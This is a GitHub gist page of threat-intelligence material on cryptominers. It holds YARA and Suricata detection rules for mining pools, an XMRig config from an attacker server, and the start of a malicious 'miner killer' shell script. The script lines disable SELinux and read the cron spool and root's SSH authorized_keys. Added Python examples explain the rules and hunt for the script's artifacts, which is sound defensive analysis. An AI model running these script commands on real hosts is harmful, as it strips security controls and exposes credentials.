GelosSnake
@GelosSnake
GelosSnake / xmrig.yar
Last active Oct 16, 2018
Very simple YARA rules to find XMRig crypto-miners
rule MinerGate
{
    strings:
        $a1 = "minergate.com"
    condition:
        $a1
}
rule MoneroOrg
{
@GelosSnake
GelosSnake / crypto-Miners_public_pools_sig.txt
Last active Jul 31, 2019
Suricata crypto-miner pool rules
#Suricata 3.2+ (dns_query sticky buffer; isdataat:!1,relative requires the name to end
# right after "com", so a longer name such as pool.minergate.com.example does not match,
# while a prefixed one such as a.pool.minergate.com still does)
alert dns $HOME_NET any -> any any (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minergate.com)"; dns_query; content:"pool.minergate.com"; nocase; isdataat:!1,relative; classtype:trojan-activity; sid:20000000; rev:1;)
#Suricata 1.3+ (raw UDP payload: byte 2 = 0x01 is a standard query with RD set, the next
# seven bytes after the second flags byte are QDCOUNT=1, ANCOUNT=0, NSCOUNT=0 and the high
# byte of ARCOUNT; the QNAME is in wire format, so the dots become label-length bytes and a
# plain "pool.minergate.com" content would never match here)
# NOTE: same sid as the rule above. The two are alternatives for different Suricata
# versions; load one or the other, since loading both in one ruleset triggers a
# duplicate-signature error.
alert udp $HOME_NET any -> any 53 (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minergate.com)"; content:"|01|"; offset:2; depth:1; content:"|00 01 00 00 00 00 00|"; distance:1; within:7; content:"|04|pool|09|minergate|03|com|00|"; nocase; distance:0; fast_pattern; classtype:trojan-activity; sid:20000000; rev:1;)
#Suricata 3.2+
alert dns $HOME_NET any -> any any (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minexmr.com)"; dns_query; content:"pool.minexmr.com"; nocase; isdataat:!1,relative; classtype:trojan-activity; sid:20000001; rev:1;)
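The UDP rule above matches bytes, not the dotted name, which is easy to get wrong when writing or testing such signatures. The following is an added example, not code from the gist: it builds a DNS query the way a resolver puts it on the wire and applies the same three checks the sid:20000000 udp rule expresses with content/offset/depth/distance/within. The transaction ID, the test domains and the packet builder are assumptions for illustration.

```python
"""Mirror of the byte-level checks in the Suricata 1.3+ UDP rule (added example)."""
import struct


def encode_qname(name: str) -> bytes:
    """DNS wire format: each label is length-prefixed, the name ends with 0x00.
    'pool.minergate.com' -> b'\\x04pool\\x09minergate\\x03com\\x00'."""
    out = b""
    for label in name.rstrip(".").split("."):
        if not 0 < len(label) < 64:
            raise ValueError("bad label: %r" % label)
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name: str, txid: int = 0x1234, flags: int = 0x0100, qtype: int = 1) -> bytes:
    """Constructed query packet: header (ID, flags, QDCOUNT=1, AN/NS/AR=0), one question, class IN.
    flags 0x0100 is a standard query with RD set; 0x8180 would be a typical response."""
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_qname(name) + struct.pack("!HH", qtype, 1)


def rule_matches(payload: bytes, domain: str = "pool.minergate.com") -> bool:
    """Same conditions as the udp rule, applied in the same order."""
    # content:"|01|"; offset:2; depth:1;  -> the byte at index 2 must be 0x01
    if len(payload) < 3 or payload[2] != 0x01:
        return False
    # content:"|00 01 00 00 00 00 00|"; distance:1; within:7;
    # previous match ended at index 3; skip one byte, the next seven must be exactly these
    if payload[4:11] != b"\x00\x01\x00\x00\x00\x00\x00":
        return False
    # content:"|04|pool|09|minergate|03|com|00|"; nocase; distance:0;
    # search from the end of the previous match to the end of the payload, case-insensitively
    needle = encode_qname(domain).lower()
    return needle in payload[11:].lower()


def naive_matches(payload: bytes, domain: str = "pool.minergate.com") -> bool:
    """What a rule with content:"pool.minergate.com" (no dns_query buffer) would test."""
    return domain.encode("ascii") in payload


if __name__ == "__main__":
    for name in ("pool.minergate.com", "POOL.MinerGate.COM", "pool.minergate.com.example", "xpool.minergate.com"):
        pkt = build_query(name)
        print("%-30s rule=%s naive=%s" % (name, rule_matches(pkt), naive_matches(pkt)))
```

The `nocase` modifier is safe on the label-encoded content because lower-casing only touches ASCII letters; the length bytes 0x04, 0x09 and 0x03 are unaffected. The trailing 0x00 is what stops a longer suffix from matching, which is the UDP-rule counterpart of `isdataat:!1,relative` in the dns_query rule.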
@GelosSnake
GelosSnake / gist:88694aef6c2819f1f11a42b73d09e421
Created Dec 24, 2018
Configuration used by the sh miner killer, taken from 45[.]76[.]122[.]92
related hash: 21ab6585aacf15cbf414d492c470a987a5f47602a441816cbea3c69aa715b6cc
source: hxxp://45[.]76.122.92:8506/IOFoqIgyC0zmf2UR/config.json
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
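The config above is JSON with `//` comments, which `json.loads` rejects outright, and a naive "delete everything after //" pass breaks any pool URL such as `stratum+tcp://...`. The following is an added example, not the gist's or XMRig's code: a small comment-aware stripper followed by a triage helper. The sample config is constructed from the fields shown above; the `pools` array with its `url`/`user` placeholders is an assumption and not taken from the sample.

```python
"""Parse an XMRig-style config.json that carries // and /* */ comments (added example)."""
import json

# Constructed sample: the five fields from the gist plus an assumed, placeholder pool entry.
SAMPLE_CONFIG = r'''{
    "algo": "cryptonight", // cryptonight (default) or cryptonight-lite
    "av": 0, // algorithm variation, 0 auto select
    "background": true, // true to run the miner in the background
    "colors": true, // false to disable colored output
    "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
    "pools": [
        {
            "url": "stratum+tcp://pool.example.invalid:3333", /* placeholder, not from the sample */
            "user": "placeholder_wallet_address"
        }
    ]
}'''


def strip_json_comments(text: str) -> str:
    """Remove // and /* */ comments that sit outside string literals.
    Tracks string state so a "//" inside a URL value is kept verbatim."""
    out = []
    i, n = 0, len(text)
    in_str = False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:   # copy the escaped character, e.g. \" does not end the string
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):   # line comment: drop up to (not including) the newline
            while i < n and text[i] != "\n":
                i += 1
            continue
        elif text.startswith("/*", i):   # block comment: drop through the closing */
            end = text.find("*/", i + 2)
            i = n if end < 0 else end + 2
            continue
        else:
            out.append(c)
        i += 1
    return "".join(out)


def load_miner_config(text: str) -> dict:
    return json.loads(strip_json_comments(text))


def triage(cfg: dict) -> dict:
    """Fields an analyst wants first: algorithm, whether it daemonises, and where it connects."""
    pools = cfg.get("pools", [])
    return {
        "algo": cfg.get("algo"),
        "background": bool(cfg.get("background")),
        "pools": [p.get("url") for p in pools if isinstance(p, dict)],
    }


if __name__ == "__main__":
    print(triage(load_miner_config(SAMPLE_CONFIG)))
```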
@GelosSnake
GelosSnake / sh
Last active Mar 20, 2019
miner killer sh (malicious) - 21ab6585aacf15cbf414d492c470a987a5f47602a441816cbea3c69aa715b6cc
#!/bin/sh
# Turns off SELinux enforcement. Note the typo: 2>dev/null is a relative path, so unless the
# working directory is / the redirection fails and, per POSIX sh, the command is not run at all.
setenforce 0 2>dev/null
# Replaces the whole SELinux config so it stays disabled across reboots.
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
# Flushes the page cache.
sync && echo 3 >/proc/sys/vm/drop_caches
# Captures the current user's cron spool and root's authorized_keys (the listing ends
# before the script shows what it does with them).
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
# Drops a marker file and records the path to curl.
echo 1 > /etc/devtools
rtdir="/etc/devtools"
bbdir="/usr/bin/curl"
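The visible lines give two definite host artifacts (the `/etc/devtools` marker and a SELinux config reduced to a single line) and two files the script reads. The following is an added example, not the gist's code: a check that reads those paths under a root directory, so it can be pointed at a mounted image or a live host, with a constructed directory tree standing in for a hit. The paths come from the script; treating a file that contains only `SELINUX=disabled` as suspicious is an assumption (a distribution-shipped file normally carries comments and a SELINUXTYPE= line), and the cron line in the sample tree is made up.

```python
"""Hunt for the artifacts the sh sample leaves behind (added example)."""
import os
import tempfile


def _read(root: str, rel: str):
    """Return the file's text, or None if it is absent or unreadable."""
    path = os.path.join(root, rel.lstrip("/"))
    try:
        with open(path, "r", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


def check_host(root: str = "/", user: str = "root") -> list:
    """Findings derived from the script lines, most specific first."""
    findings = []

    # echo 1 > /etc/devtools : marker file with no legitimate reason to exist
    marker = _read(root, "/etc/devtools")
    if marker is not None:
        findings.append("/etc/devtools marker present (content %r)" % marker.strip())

    # echo SELINUX=disabled > /etc/sysconfig/selinux : the whole file is replaced
    sel = _read(root, "/etc/sysconfig/selinux")
    if sel is not None and sel.strip() == "SELINUX=disabled":
        findings.append("/etc/sysconfig/selinux reduced to a lone SELINUX=disabled line")

    # crondir='/var/spool/cron/'"$USER" and /root/.ssh/authorized_keys are read by the script;
    # the listing ends before we see what it writes, so only surface them for manual review
    for rel in ("/var/spool/cron/%s" % user, "/root/.ssh/authorized_keys"):
        content = _read(root, rel)
        if content:
            findings.append("%s present, review manually (%d line(s))" % (rel, content.count("\n") or 1))
    return findings


def make_sample_root() -> str:
    """Constructed directory tree mimicking a host the script ran on (test data, not a real image)."""
    root = tempfile.mkdtemp(prefix="minerkiller_")
    files = {
        "etc/devtools": "1\n",
        "etc/sysconfig/selinux": "SELINUX=disabled\n",
        "var/spool/cron/root": "*/10 * * * * /tmp/.x/run.sh\n",   # made-up cron line
    }
    for rel, text in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)
    return root


if __name__ == "__main__":
    for line in check_host(make_sample_root()):
        print(line)
```

Run it against a mounted image with `check_host("/mnt/evidence")`; on a live host the default root of `/` is used, and the user argument should be whatever `$USER` was when the script ran, since the cron path is built from it.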
@GelosSnake
GelosSnake / keybase.md
Created May 31, 2019
GelosSnake keybase

Keybase proof

I hereby claim:

  • I am gelossnake on github.
  • I am gelossnake (https://keybase.io/gelossnake) on keybase.
  • I have a public key ASAwA_u6Qo3Rss8MsguyHw0fr0ouch111TV1zcmoTwOk0wo

To claim this, I am signing this object:
